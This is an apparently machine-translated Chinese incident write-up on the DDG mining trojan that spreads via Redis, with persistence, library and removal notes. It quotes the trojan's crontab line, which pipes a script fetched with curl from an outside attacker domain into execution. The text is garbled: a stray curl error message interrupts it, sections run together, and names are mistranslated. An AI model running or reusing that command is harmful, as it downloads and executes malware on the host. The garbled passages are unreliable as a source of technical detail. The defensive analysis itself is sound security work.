最近,LeTV安全中心收到了来自用户服务器的高负荷警报。经过安全人员分析和分析,发现挖掘木马-ddg通过redis漏洞传播,消耗大量服务器资源,难以删除,具有内网扩散功能。本文分析了特洛伊木马传输的具体功能和方式以及乐视安全中心提供的解决方案。
0x01木马行为
登录到受感染的服务器,使用top查看CPU使用情况,查找CPU使用过程AnXqV 通过kill杀死AnXqV进程并将其删除。大约15分钟后,系统报警,AnXqV被创建并再次启动(https://www.com/archives/56741.html安全脉冲) 这时,计时器发现View crontab命令: curl -fsSLhttp://www.haveabitchin.com/pm.sh?223 |是时候下载并执行以下脚本了:
0x02木马功能
Ddg.222没有为golang写明显的函数符号和字符串特征
编写一个帮助程序脚本,根据编译的版本恢复golang函数符号
摘要DDG主要使用函数库shirou_gopsutil,VividCortex_godaemon,boltdb_bolt,garyburd_redigo,golang_protobuf_proto,hashicorp_yamux,moul_http2curl,parnurzeal_gorequest,satori_go_2euuid Failure when receiving data from the peer 4.删除特洛伊木马和未知的公钥文件。 (例如/tmp/ddg.222,/tmp/AnXqV.yam,/tmp/AnXqV,/tmp/AnXqV.noaes等等〜/.ssh /中的未知授权) 5.终止特洛伊木马进程。 (例如pkill AnXqV,pkill ddg.222)
0x04摘要
通过对该木马增殖事件的分析和处理,为了减少和消除此类事件的再次发生,提高安全预警能力,业界同仁提醒要更加注重日常运营的维护安全细节。带宽和高资源服务器: 1.严格授权各种类型的访问认证 2,定期检查和实时抽查服务器状态,异常流量和CPU消耗需要及时报告,以便与专业安全团队进行分析和合作 3.关注敏感安全事件,及时修复高风险漏洞 [原创:挖掘木马Ddg分析 音乐为NSIRT 论文由音乐结算,作为安全应急响应中心安全账号脉冲释放]